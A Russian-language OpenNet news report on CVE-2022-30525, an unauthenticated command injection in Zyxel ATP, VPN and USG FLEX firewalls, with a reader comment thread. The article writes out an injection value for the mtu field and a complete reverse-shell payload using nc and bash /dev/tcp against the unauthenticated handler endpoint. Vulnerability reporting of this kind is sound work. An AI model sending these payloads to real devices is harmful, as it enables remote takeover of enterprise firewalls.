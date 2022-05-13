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Уязвимость в межсетевых экранах Zyxel, позволяющая выполнить код без аутентификации

13.05.2022 13:34

В устройствах Zyxel серий ATP, VPN и USG FLEX, предназначенных для организации работы межсетевых экранов, IDS и VPN на предприятиях, выявлена критическая уязвимость (CVE-2022-30525), позволяющая внешнему атакующему без аутентификации выполнить код на устройстве с правами пользователя nobody. Для совершения атаки злоумышленник должен иметь возможность отправки на устройство запросов по протоколу HTTP/HTTPS. Компания Zyxel устранила уязвимость в обновлении прошивки ZLD 5.30. По данным сервиса Shodan в настоящее время в глобальной сети зафиксировано 16213 потенциально уязвимых устройств, принимающих запросы по HTTP/HTTPS.

Эксплуатация производится через отправку специально оформленных команд к web-обработчику /ztp/cgi-bin/handler, доступному без аутентификации. Проблема вызвана отсутствием должной чистки параметров запроса при выполнении в системе команд при помощи вызова os.system, используемого в библиотеке lib_wan_settings.py и выполняемого при обработке операции setWanPortSt.

Например, атакующий может передать в поле mtu строку "; ping 192.168.1.210;" которая приведёт к выполнению в системе команды "ping 192.168.1.210". Для получения доступа к командной оболочке можно запустить на своей системе "nc -lvnp 1270", после чего инициировать обратное соединение (reverse shell) отправив на устройство запрос с параметром '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.

  1. Главная ссылка к новости (https://www.rapid7.com/blog/po...)
  2. OpenNews: Уязвимости в Cisco RV32x были "устранены" через блокировку запросов от утилиты curl
  3. OpenNews: Уязвимость в домашних маршрутизаторах, охватывающая 17 производителей
  4. OpenNews: Уязвимости, позволяющие захватить управление коммутаторами Cisco, Zyxel и NETGEAR на чипах RTL83xx
  5. OpenNews: Уязвимости в устройствах NETGEAR, позволяющие получить доступ без аутентификации
  6. OpenNews: Уязвимости в APC Smart-UPS, позволяющие удалённо управлять устройством
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/57183-zyxel
Ключевые слова: zyxel, vulnerability
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (19) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Stanislavvv (?), 13:42, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Помнится, лет 12 назад примерно так же получал шелл в первом кинетике.
    Похоже, с тех пор ничего не изменилось...
     
     
  • 2.5, Анонус (?), 14:02, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Сейчас вроде Кинетики делает отдельная команда в России.
     
     
  • 3.7, another_one (ok), 14:18, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• +/
    Уже не команда, а вроде как отдельная независимая компания.
     
  • 3.10, Атон (?), 15:13, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• +/
    их и тогда делала отдельная русская команда. компания стартап.

    просто они договорились что zyxel предоставляет свою логистику и производство, а взамен ставит свой логотип и гребет 95% прибыли от продаж. а компания kinetic разрабатывает железки с ПО для домашнего сегмента рынка, в котором у самого zyxel всегда был "провал".

     

  • 1.2, КО (?), 13:43, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Обычно такие компании пугалки рассказывают и втюхивают новое оборудование, подпинывая клиента.
    Как и некоторые антивирусные.
     
  • 1.3, Аноним (3), 13:50, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Странно что кто-то считает что это не норма.
     
  • 1.4, Аноним (3), 13:54, 13/05/2022 Скрыто модератором [﹢﹢﹢] [ · · · ]
    		• +/
     
  • 1.6, iPony129412 (?), 14:11, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Шо, опять?!
     
     
  • 2.12, Аноним (3), 15:16, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Это норма.
     

  • 1.8, vitalif (ok), 14:19, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Говорили же вам, сносите штатное гуано сразу, ставьте openwrt
     
     
  • 2.9, Аноним (9), 14:56, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• +/
    Что-то среди поддерживаемых моделей не нашёл этих ATP, VPN и USG FLEX
     
     
  • 3.11, Аноним (3), 15:16, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Там модели поддерживает по одному человеку. Соответственно придется кому-то, например тебе, заняться поддержкой для этих моделей.
     
     
  • 4.20, Аноним (20), 18:11, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• +/
    Достаточно только пожелать и пустить газ тебе под нос?
     

  • 1.13, Аноним (13), 16:25, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Стоит какой-то древний тплинк на стоковой прошивке, уже лет 15 пашет без единого замечания. Подключил и забыл. А если нет разницы, зачем платить больше?
     
     
  • 2.14, ryoken (ok), 16:39, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• –2 +/
    >>  А если нет разницы, зачем платить больше?

    Расширение предоставляемых устройством сервисов? Не, не слышал.

     
  • 2.16, Аноним (9), 17:30, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    И что, в ней за 15 лет не нашлось ни одной дырки?
     
     
  • 3.18, YetAnotherOnanym (ok), 17:40, 13/05/2022 [^] [^^] [^^^] [ответить]  
    		• +/
    Написано же - ни единой замеченной владельцем.
     

  • 1.15, Аноним (-), 17:02, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Милота. Вебмакаки и питоняши как обычно обгадились.
     
  • 1.17, YetAnotherOnanym (ok), 17:39, 13/05/2022 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > при выполнение в системе команд при помощи вызова os.system

    Ну да, вместо вызова утилиты подгрузить либу и дёрнуть функцию - это ж надо доки на API читать, это слишком сложно.

     

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